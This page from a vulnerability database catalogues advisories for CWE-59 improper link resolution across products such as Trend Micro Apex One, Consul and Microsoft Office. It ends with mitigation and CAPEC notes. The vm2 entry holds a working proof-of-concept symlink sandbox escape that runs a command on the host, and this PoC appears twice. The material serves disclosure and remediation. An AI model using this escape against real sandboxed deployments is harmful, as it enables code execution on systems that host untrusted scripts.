CWE-59
AllowedImproper Link Resolution Before File Access ('Link Following')
Abstraction: Base · Status: Draft
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
1988 vulnerabilities reference this CWE, most recent first.
GHSA-CMQR-CW5F-XFFM
Vulnerability from github – Published: 2024-01-23 21:30 – Updated: 2025-06-20 21:31An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.
Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-52091"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-23T21:15:09Z",
"severity": "HIGH"
},
"details": "An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
"id": "GHSA-cmqr-cw5f-xffm",
"modified": "2025-06-20T21:31:50Z",
"published": "2024-01-23T21:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52091"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/dcx/s/solution/000296151?language=en_US"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-027"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CMVV-49J4-8GJ6
Vulnerability from github – Published: 2022-05-24 16:54 – Updated: 2023-02-24 00:30IBM Informix Dynamic Server Enterprise Edition 12.1 could allow a local user logged in with database administrator user to gain root privileges through a symbolic link vulnerability in infos.DBSERVERNAME. IBM X-Force ID: 144437.
{
"affected": [],
"aliases": [
"CVE-2018-1634"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-20T19:15:00Z",
"severity": "HIGH"
},
"details": "IBM Informix Dynamic Server Enterprise Edition 12.1 could allow a local user logged in with database administrator user to gain root privileges through a symbolic link vulnerability in infos.DBSERVERNAME. IBM X-Force ID: 144437.",
"id": "GHSA-cmvv-49j4-8gj6",
"modified": "2023-02-24T00:30:16Z",
"published": "2022-05-24T16:54:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1634"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144437"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20190903-0002"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10964987"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CMVV-GWR2-36XM
Vulnerability from github – Published: 2024-09-17 00:31 – Updated: 2025-11-04 18:31This issue was addressed with improved validation of symlinks. This issue is fixed in iOS 18 and iPadOS 18, macOS Sequoia 15. An app may be able to access sensitive user data.
{
"affected": [],
"aliases": [
"CVE-2024-44131"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-17T00:15:50Z",
"severity": "MODERATE"
},
"details": "This issue was addressed with improved validation of symlinks. This issue is fixed in iOS 18 and iPadOS 18, macOS Sequoia 15. An app may be able to access sensitive user data.",
"id": "GHSA-cmvv-gwr2-36xm",
"modified": "2025-11-04T18:31:21Z",
"published": "2024-09-17T00:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-44131"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121238"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121250"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Sep/32"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Sep/33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CP6G-6699-WX9C
Vulnerability from github – Published: 2026-05-07 04:33 – Updated: 2026-05-14 20:36Summary
NodeVM's require.root path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses path.resolve() (which does not dereference symlinks) but module loading uses Node's native require() (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution.
Severity
High (CVSS 3.1: 8.5)
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network — sandboxed code is typically received from external sources (user-submitted scripts, plugin code)
- Attack Complexity: High — requires symlinks inside the allowed root that point outside it; common with pnpm, npm workspaces, and npm link but not guaranteed in all deployments
- Privileges Required: Low — attacker needs only the ability to submit code to the sandbox, which is the intended use case
- User Interaction: None
- Scope: Changed — the vulnerability is in the sandbox boundary; impact is on the host system
- Confidentiality Impact: High — arbitrary file read via host command execution
- Integrity Impact: High — arbitrary command execution on the host
- Availability Impact: High — arbitrary command execution on the host
Affected Component
lib/resolver-compat.js—CustomResolver.isPathAllowed()(line 53-60)lib/resolver-compat.js—CustomResolver.loadJS()(line 62-66)lib/filesystem.js—DefaultFileSystem.resolve()(line 8-10)
CWE
- CWE-59: Improper Link Resolution Before File Access
Description
Root Cause: Check/Use Path Discrepancy
The isPathAllowed method validates whether a resolved filename falls within the allowed root paths using a string-prefix check:
// lib/resolver-compat.js:53-60
isPathAllowed(filename) {
return this.rootPaths === undefined || this.rootPaths.some(path => {
if (!filename.startsWith(path)) return false;
const len = path.length;
if (filename.length === len || (len > 0 && this.fs.isSeparator(path[len-1]))) return true;
return this.fs.isSeparator(filename[len]);
});
}
The filename passed to this check is resolved via DefaultFileSystem.resolve(), which uses path.resolve():
// lib/filesystem.js:8-10
resolve(path) {
return pa.resolve(path);
}
path.resolve() normalizes the path (resolves ., .., and makes it absolute) but does NOT dereference symlinks. A symlink at /root/node_modules/safe pointing to /outside/root/malicious resolves to /root/node_modules/safe — passing the prefix check.
However, the actual module loading uses Node's native require(), which does follow symlinks:
// lib/resolver-compat.js:62-66
loadJS(vm, mod, filename) {
if (this.pathContext(filename, 'js') !== 'host') return super.loadJS(vm, mod, filename);
const m = this.hostRequire(filename);
mod.exports = vm.readonly(m);
}
No Symlink Defenses Exist
A search for realpath, readlink, lstat, or any symlink-aware function across the entire lib/ directory returns zero results. Neither DefaultFileSystem nor VMFileSystem provides a realpath method. The root paths themselves are also resolved without dereferencing symlinks:
// lib/resolver-compat.js:218
const checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f => fsOpt.resolve(f)) : undefined;
Full Execution Chain
- Host creates
NodeVMwithrequire: { external: ['safe'], root: '/tmp/root', context: 'host' } - A symlink exists:
/tmp/root/node_modules/safe→/outside/root/vm2/(e.g., via pnpm, npm link, or workspaces) - Sandbox code calls
require('safe') DefaultResolver.resolveFull()resolves to/tmp/root/node_modules/safe/index.jstryFile()callsthis.fs.resolve(x)→path.resolve()→/tmp/root/node_modules/safe/index.js(symlink NOT followed)isPathAllowed()checks if path starts with/tmp/root/→ PASSESloadJS()detectscontext: 'host', callsthis.hostRequire(filename)- Node's
require()follows the symlink, loads from/outside/root/vm2/index.js - Module executes in host realm; exports proxied to sandbox
- Sandbox uses loaded module to escalate (e.g., creates a new privileged NodeVM with
child_process)
Proof of Concept
const path = require('path');
const fs = require('fs');
const os = require('os');
const { NodeVM } = require('vm2');
// Create an "allowed" root directory
const root = fs.mkdtempSync(path.join(os.tmpdir(), 'vm2-root-'));
fs.mkdirSync(path.join(root, 'node_modules'), { recursive: true });
// Symlink inside root pointing to vm2 package outside root
// In real deployments: pnpm, npm link, workspaces create these automatically
const link = path.join(root, 'node_modules', 'safe');
fs.symlinkSync(path.resolve(__dirname), link, 'dir');
const vm = new NodeVM({
require: {
external: ['safe'],
root,
context: 'host',
builtin: [], // no builtins allowed
},
});
// Sandbox code loads vm2 from outside root via symlink,
// creates a privileged inner NodeVM to get child_process
const out = vm.run(`
const { NodeVM } = require('safe');
const inner = new NodeVM({ require: { builtin: ['child_process'] } });
module.exports = inner.run(
"module.exports = require('child_process').execSync('id').toString()",
'inner.js'
);
`, path.join(root, 'vm.js'));
console.log(out.trim()); // prints host uid/gid — RCE achieved
Impact
- Sandbox escape: Untrusted sandboxed code can load arbitrary modules from outside the allowed root directory in host context.
- Remote code execution: By loading vm2 itself (or any module with dangerous capabilities), the attacker can execute arbitrary commands on the host system.
- Bypasses
require.rootentirely: The root restriction — the primary defense against module loading attacks — provides no protection when symlinks are present. - Common in production: pnpm (where ALL
node_modulesare symlinks), npm workspaces, andnpm linkall create the symlink conditions required for exploitation. - Silent failure: No error or warning is raised when a symlink traverses outside the root.
Recommended Remediation
Option 1: Dereference symlinks with fs.realpathSync before path validation (Preferred)
Resolve symlinks before checking against root paths, so the validation operates on the actual filesystem location:
// lib/filesystem.js — add a realpath method
const fs = require('fs');
class DefaultFileSystem {
resolve(path) {
return pa.resolve(path);
}
realpath(path) {
return fs.realpathSync(path);
}
// ... rest unchanged
}
// lib/resolver-compat.js — use realpath in isPathAllowed or before calling it
isPathAllowed(filename) {
let realFilename;
try {
realFilename = this.fs.realpath(filename);
} catch (e) {
return false; // file doesn't exist or can't be resolved
}
return this.rootPaths === undefined || this.rootPaths.some(path => {
if (!realFilename.startsWith(path)) return false;
const len = path.length;
if (realFilename.length === len || (len > 0 && this.fs.isSeparator(path[len-1]))) return true;
return this.fs.isSeparator(realFilename[len]);
});
}
Also dereference root paths at construction time:
// lib/resolver-compat.js:218
const checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f => {
const resolved = fsOpt.resolve(f);
try { return fs.realpathSync(resolved); } catch (e) { return resolved; }
}) : undefined;
Tradeoff: realpathSync adds a syscall per path check. Cache results to minimize overhead.
Option 2: Validate the realpath in makeExtensionHandler / checkAccess
Add a realpath check at the enforcement point in Resolver.makeExtensionHandler:
makeExtensionHandler(vm, name) {
return (mod, filename) => {
filename = this.fs.resolve(filename);
// Dereference symlinks before access check
try {
const realFilename = fs.realpathSync(filename);
if (realFilename !== filename) {
// Filename was a symlink — validate the real path too
this.checkAccess(mod, realFilename);
}
} catch (e) {
throw new VMError(`Access denied to require '${filename}'`, 'EDENIED');
}
this.checkAccess(mod, filename);
this[name](vm, mod, filename);
};
}
Tradeoff: Fixes it at a higher layer but doesn't protect custom resolvers that bypass makeExtensionHandler.
Credit
This vulnerability was discovered and reported by bugbunny.ai.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "3.10.5"
},
{
"fixed": "3.11.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.10.5"
]
}
],
"aliases": [
"CVE-2026-43998"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T04:33:37Z",
"nvd_published_at": "2026-05-13T18:16:16Z",
"severity": "HIGH"
},
"details": "## Summary\nNodeVM\u0027s `require.root` path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses `path.resolve()` (which does not dereference symlinks) but module loading uses Node\u0027s native `require()` (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution.\n\n## Severity\n**High** (CVSS 3.1: 8.5)\n\n`CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H`\n\n- **Attack Vector:** Network \u2014 sandboxed code is typically received from external sources (user-submitted scripts, plugin code)\n- **Attack Complexity:** High \u2014 requires symlinks inside the allowed root that point outside it; common with pnpm, npm workspaces, and npm link but not guaranteed in all deployments\n- **Privileges Required:** Low \u2014 attacker needs only the ability to submit code to the sandbox, which is the intended use case\n- **User Interaction:** None\n- **Scope:** Changed \u2014 the vulnerability is in the sandbox boundary; impact is on the host system\n- **Confidentiality Impact:** High \u2014 arbitrary file read via host command execution\n- **Integrity Impact:** High \u2014 arbitrary command execution on the host\n- **Availability Impact:** High \u2014 arbitrary command execution on the host\n\n## Affected Component\n- `lib/resolver-compat.js` \u2014 `CustomResolver.isPathAllowed()` (line 53-60)\n- `lib/resolver-compat.js` \u2014 `CustomResolver.loadJS()` (line 62-66)\n- `lib/filesystem.js` \u2014 `DefaultFileSystem.resolve()` (line 8-10)\n\n## CWE\n- **CWE-59**: Improper Link Resolution Before File Access\n\n## Description\n\n### Root Cause: Check/Use Path Discrepancy\n\nThe `isPathAllowed` method validates whether a resolved filename falls within the allowed root paths using a string-prefix check:\n\n```js\n// lib/resolver-compat.js:53-60\nisPathAllowed(filename) {\n return this.rootPaths === undefined || this.rootPaths.some(path =\u003e {\n if (!filename.startsWith(path)) return false;\n const len = path.length;\n if (filename.length === len || (len \u003e 0 \u0026\u0026 this.fs.isSeparator(path[len-1]))) return true;\n return this.fs.isSeparator(filename[len]);\n });\n}\n```\n\nThe filename passed to this check is resolved via `DefaultFileSystem.resolve()`, which uses `path.resolve()`:\n\n```js\n// lib/filesystem.js:8-10\nresolve(path) {\n return pa.resolve(path);\n}\n```\n\n`path.resolve()` normalizes the path (resolves `.`, `..`, and makes it absolute) but does **NOT** dereference symlinks. A symlink at `/root/node_modules/safe` pointing to `/outside/root/malicious` resolves to `/root/node_modules/safe` \u2014 passing the prefix check.\n\nHowever, the actual module loading uses Node\u0027s native `require()`, which **does** follow symlinks:\n\n```js\n// lib/resolver-compat.js:62-66\nloadJS(vm, mod, filename) {\n if (this.pathContext(filename, \u0027js\u0027) !== \u0027host\u0027) return super.loadJS(vm, mod, filename);\n const m = this.hostRequire(filename);\n mod.exports = vm.readonly(m);\n}\n```\n\n### No Symlink Defenses Exist\n\nA search for `realpath`, `readlink`, `lstat`, or any symlink-aware function across the entire `lib/` directory returns zero results. Neither `DefaultFileSystem` nor `VMFileSystem` provides a realpath method. The root paths themselves are also resolved without dereferencing symlinks:\n\n```js\n// lib/resolver-compat.js:218\nconst checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f =\u003e fsOpt.resolve(f)) : undefined;\n```\n\n### Full Execution Chain\n\n1. Host creates `NodeVM` with `require: { external: [\u0027safe\u0027], root: \u0027/tmp/root\u0027, context: \u0027host\u0027 }`\n2. A symlink exists: `/tmp/root/node_modules/safe` \u2192 `/outside/root/vm2/` (e.g., via pnpm, npm link, or workspaces)\n3. Sandbox code calls `require(\u0027safe\u0027)`\n4. `DefaultResolver.resolveFull()` resolves to `/tmp/root/node_modules/safe/index.js`\n5. `tryFile()` calls `this.fs.resolve(x)` \u2192 `path.resolve()` \u2192 `/tmp/root/node_modules/safe/index.js` (symlink NOT followed)\n6. `isPathAllowed()` checks if path starts with `/tmp/root/` \u2192 **PASSES**\n7. `loadJS()` detects `context: \u0027host\u0027`, calls `this.hostRequire(filename)`\n8. Node\u0027s `require()` follows the symlink, loads from `/outside/root/vm2/index.js`\n9. Module executes in host realm; exports proxied to sandbox\n10. Sandbox uses loaded module to escalate (e.g., creates a new privileged NodeVM with `child_process`)\n\n## Proof of Concept\n\n```js\nconst path = require(\u0027path\u0027);\nconst fs = require(\u0027fs\u0027);\nconst os = require(\u0027os\u0027);\nconst { NodeVM } = require(\u0027vm2\u0027);\n\n// Create an \"allowed\" root directory\nconst root = fs.mkdtempSync(path.join(os.tmpdir(), \u0027vm2-root-\u0027));\nfs.mkdirSync(path.join(root, \u0027node_modules\u0027), { recursive: true });\n\n// Symlink inside root pointing to vm2 package outside root\n// In real deployments: pnpm, npm link, workspaces create these automatically\nconst link = path.join(root, \u0027node_modules\u0027, \u0027safe\u0027);\nfs.symlinkSync(path.resolve(__dirname), link, \u0027dir\u0027);\n\nconst vm = new NodeVM({\n require: {\n external: [\u0027safe\u0027],\n root,\n context: \u0027host\u0027,\n builtin: [], // no builtins allowed\n },\n});\n\n// Sandbox code loads vm2 from outside root via symlink,\n// creates a privileged inner NodeVM to get child_process\nconst out = vm.run(`\n const { NodeVM } = require(\u0027safe\u0027);\n const inner = new NodeVM({ require: { builtin: [\u0027child_process\u0027] } });\n module.exports = inner.run(\n \"module.exports = require(\u0027child_process\u0027).execSync(\u0027id\u0027).toString()\",\n \u0027inner.js\u0027\n );\n`, path.join(root, \u0027vm.js\u0027));\n\nconsole.log(out.trim()); // prints host uid/gid \u2014 RCE achieved\n```\n\n## Impact\n- **Sandbox escape**: Untrusted sandboxed code can load arbitrary modules from outside the allowed root directory in host context.\n- **Remote code execution**: By loading vm2 itself (or any module with dangerous capabilities), the attacker can execute arbitrary commands on the host system.\n- **Bypasses `require.root` entirely**: The root restriction \u2014 the primary defense against module loading attacks \u2014 provides no protection when symlinks are present.\n- **Common in production**: pnpm (where ALL `node_modules` are symlinks), npm workspaces, and `npm link` all create the symlink conditions required for exploitation.\n- **Silent failure**: No error or warning is raised when a symlink traverses outside the root.\n\n## Recommended Remediation\n\n### Option 1: Dereference symlinks with `fs.realpathSync` before path validation (Preferred)\n\nResolve symlinks before checking against root paths, so the validation operates on the actual filesystem location:\n\n```js\n// lib/filesystem.js \u2014 add a realpath method\nconst fs = require(\u0027fs\u0027);\n\nclass DefaultFileSystem {\n resolve(path) {\n return pa.resolve(path);\n }\n\n realpath(path) {\n return fs.realpathSync(path);\n }\n // ... rest unchanged\n}\n```\n\n```js\n// lib/resolver-compat.js \u2014 use realpath in isPathAllowed or before calling it\nisPathAllowed(filename) {\n let realFilename;\n try {\n realFilename = this.fs.realpath(filename);\n } catch (e) {\n return false; // file doesn\u0027t exist or can\u0027t be resolved\n }\n return this.rootPaths === undefined || this.rootPaths.some(path =\u003e {\n if (!realFilename.startsWith(path)) return false;\n const len = path.length;\n if (realFilename.length === len || (len \u003e 0 \u0026\u0026 this.fs.isSeparator(path[len-1]))) return true;\n return this.fs.isSeparator(realFilename[len]);\n });\n}\n```\n\nAlso dereference root paths at construction time:\n\n```js\n// lib/resolver-compat.js:218\nconst checkedRootPaths = rootPaths ? (Array.isArray(rootPaths) ? rootPaths : [rootPaths]).map(f =\u003e {\n const resolved = fsOpt.resolve(f);\n try { return fs.realpathSync(resolved); } catch (e) { return resolved; }\n}) : undefined;\n```\n\n**Tradeoff**: `realpathSync` adds a syscall per path check. Cache results to minimize overhead.\n\n### Option 2: Validate the realpath in `makeExtensionHandler` / `checkAccess`\n\nAdd a realpath check at the enforcement point in `Resolver.makeExtensionHandler`:\n\n```js\nmakeExtensionHandler(vm, name) {\n return (mod, filename) =\u003e {\n filename = this.fs.resolve(filename);\n // Dereference symlinks before access check\n try {\n const realFilename = fs.realpathSync(filename);\n if (realFilename !== filename) {\n // Filename was a symlink \u2014 validate the real path too\n this.checkAccess(mod, realFilename);\n }\n } catch (e) {\n throw new VMError(`Access denied to require \u0027${filename}\u0027`, \u0027EDENIED\u0027);\n }\n this.checkAccess(mod, filename);\n this[name](vm, mod, filename);\n };\n}\n```\n\n**Tradeoff**: Fixes it at a higher layer but doesn\u0027t protect custom resolvers that bypass `makeExtensionHandler`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
"id": "GHSA-cp6g-6699-wx9c",
"modified": "2026-05-14T20:36:59Z",
"published": "2026-05-07T04:33:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43998"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 has a NodeVM require.root bypass via symlink traversal that allows sandbox escape"
}
GHSA-CP8G-G2CJ-X6HM
Vulnerability from github – Published: 2022-05-17 05:12 – Updated: 2025-04-11 04:09Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c read_config implementation that loads the contents of the .pangorc file in the user's home directory, and the file referenced by the PANGO_RC_FILE environment variable, which allows attackers to bypass intended access restrictions via crafted configuration data.
{
"affected": [],
"aliases": [
"CVE-2013-0927"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-04-10T16:55:00Z",
"severity": "HIGH"
},
"details": "Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c read_config implementation that loads the contents of the .pangorc file in the user\u0027s home directory, and the file referenced by the PANGO_RC_FILE environment variable, which allows attackers to bypass intended access restrictions via crafted configuration data.",
"id": "GHSA-cp8g-g2cj-x6hm",
"modified": "2025-04-11T04:09:13Z",
"published": "2022-05-17T05:12:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-0927"
},
{
"type": "WEB",
"url": "https://code.google.com/p/chromium/issues/detail?id=189250"
},
{
"type": "WEB",
"url": "http://git.chromium.org/gitweb/?p=chromiumos/overlays/chromiumos-overlay.git%3Ba=commit%3Bh=fb5a664def6cd34bf7295489ea73e1d989bdd6d0"
},
{
"type": "WEB",
"url": "http://git.chromium.org/gitweb/?p=chromiumos/overlays/chromiumos-overlay.git;a=commit;h=fb5a664def6cd34bf7295489ea73e1d989bdd6d0"
},
{
"type": "WEB",
"url": "http://googlechromereleases.blogspot.com/2013/04/chrome-os-stable-channel-update.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-CPFQ-66P2-336J
Vulnerability from github – Published: 2026-03-12 00:31 – Updated: 2026-03-24 21:03HashiCorp Consul and Consul Enterprise 1.18.20 up to 1.21.10 and 1.22.4 are vulnerable to arbitrary file read when configured with Kubernetes authentication. This vulnerability, CVE-2026-2808, is fixed in Consul 1.18.21, 1.21.11 and 1.22.5.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/hashicorp/consul"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.18.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/hashicorp/consul"
},
"ranges": [
{
"events": [
{
"introduced": "1.22.0-rc1"
},
{
"fixed": "1.22.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/hashicorp/consul"
},
"ranges": [
{
"events": [
{
"introduced": "1.19.0"
},
{
"fixed": "1.21.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2808"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T17:34:04Z",
"nvd_published_at": "2026-03-12T00:16:11Z",
"severity": "MODERATE"
},
"details": "HashiCorp Consul and Consul Enterprise 1.18.20 up to 1.21.10 and 1.22.4 are vulnerable to arbitrary file read when configured with Kubernetes authentication. This vulnerability, CVE-2026-2808, is fixed in Consul 1.18.21, 1.21.11 and 1.22.5.",
"id": "GHSA-cpfq-66p2-336j",
"modified": "2026-03-24T21:03:57Z",
"published": "2026-03-12T00:31:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2808"
},
{
"type": "WEB",
"url": "https://discuss.hashicorp.com/t/hcsec-2026-02-consul-vulnerable-to-arbitrary-file-reads-through-the-vault-kubernetes-authentication-provider/77232"
},
{
"type": "PACKAGE",
"url": "https://github.com/hashicorp/consul"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4690"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Consul is vulnerable to arbitrary file read when configured with Kubernetes authentication"
}
GHSA-CPVW-CPX2-C4J9
Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-06-29 00:00Windows Mobile Device Management Information Disclosure Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-24084"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-02-25T23:15:00Z",
"severity": "MODERATE"
},
"details": "Windows Mobile Device Management Information Disclosure Vulnerability",
"id": "GHSA-cpvw-cpx2-c4j9",
"modified": "2022-06-29T00:00:47Z",
"published": "2022-05-24T17:43:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24084"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CQCQ-M56R-2WGX
Vulnerability from github – Published: 2022-05-17 05:52 – Updated: 2022-05-17 05:52gpsdrive (aka gpsdrive-scripts) 2.09 allows local users to overwrite arbitrary files via a symlink attack on an (a) /tmp/geo#####, a (b) /tmp/geocaching.loc, a (c) /tmp/geo#####., or a (d) /tmp/geo. temporary file, related to the (1) geo-code and (2) geo-nearest scripts, different vectors than CVE-2008-4959.
{
"affected": [],
"aliases": [
"CVE-2008-5380"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-12-08T23:30:00Z",
"severity": "MODERATE"
},
"details": "gpsdrive (aka gpsdrive-scripts) 2.09 allows local users to overwrite arbitrary files via a symlink attack on an (a) /tmp/geo#####, a (b) /tmp/geocaching.loc, a (c) /tmp/geo#####.*, or a (d) /tmp/geo.* temporary file, related to the (1) geo-code and (2) geo-nearest scripts, different vectors than CVE-2008-4959.",
"id": "GHSA-cqcq-m56r-2wgx",
"modified": "2022-05-17T05:52:26Z",
"published": "2022-05-17T05:52:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5380"
},
{
"type": "WEB",
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-February/msg00187.html"
},
{
"type": "WEB",
"url": "http://lists.debian.org/debian-devel/2008/08/msg00285.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/31694"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/33825"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-CR38-7WWG-698R
Vulnerability from github – Published: 2023-07-11 18:31 – Updated: 2025-02-28 21:32Microsoft Office Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2023-33148"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-11T18:15:14Z",
"severity": "HIGH"
},
"details": "Microsoft Office Elevation of Privilege Vulnerability",
"id": "GHSA-cr38-7wwg-698r",
"modified": "2025-02-28T21:32:03Z",
"published": "2023-07-11T18:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33148"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33148"
},
{
"type": "WEB",
"url": "https://packetstorm.news/files/id/173591"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/173591/Microsoft-Office-365-18.2305.1222.0-Remote-Code-Execution.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CR45-X768-75RF
Vulnerability from github – Published: 2026-02-10 00:30 – Updated: 2026-02-10 00:30Tanium addressed an arbitrary file deletion vulnerability in Tanium EUSS.
{
"affected": [],
"aliases": [
"CVE-2025-15313"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-10T00:16:05Z",
"severity": "MODERATE"
},
"details": "Tanium addressed an arbitrary file deletion vulnerability in Tanium EUSS.",
"id": "GHSA-cr45-x768-75rf",
"modified": "2026-02-10T00:30:31Z",
"published": "2026-02-10T00:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15313"
},
{
"type": "WEB",
"url": "https://security.tanium.com/TAN-2025-010"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-48.1
Strategy: Separation of Privilege
- Follow the principle of least privilege when assigning access rights to entities in a software system.
- Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack
An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.
CAPEC-17: Using Malicious Files
